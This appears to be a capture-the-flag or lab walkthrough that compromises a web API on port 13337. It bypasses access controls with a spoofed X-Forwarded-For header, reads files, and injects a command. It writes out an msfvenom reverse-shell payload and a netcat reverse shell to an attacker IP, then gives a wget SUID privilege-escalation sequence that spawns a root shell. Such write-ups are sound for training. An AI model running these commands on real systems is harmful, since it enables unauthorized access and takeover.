13337
Available methods:
/version
/update
/logs
/restartUsing /logs
This means the access is denied for our host but maybe the localhost can access.
Intercept the request: 
Now we can use X-Forwarded-For Header to spoof the localhost: 
We have file read: 
We have a user called clumsyadmin
We can create an ELF reverse shell executeable:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.45.229 LPORT=13337 -f elf > shellNow start a python server:
python3 -m uploadserver 80Now we can use /update:
But no shell when visiting /restart. This is intended path but we do not get a shell.
Now we can get main.py using /logs 
We can try command injection:
Using payload:
nc 192.168.45.229 13337 -e /bin/bash
We get a shell: 
Running linpeas:
We have wget as an SUID binary.
TF=$(mktemp)
chmod +x $TF
echo -e '#!/bin/sh -p\n/bin/sh -p 1>&0' >$TF
wget --use-askpass=$TF 0
Last updated
Was this helpful?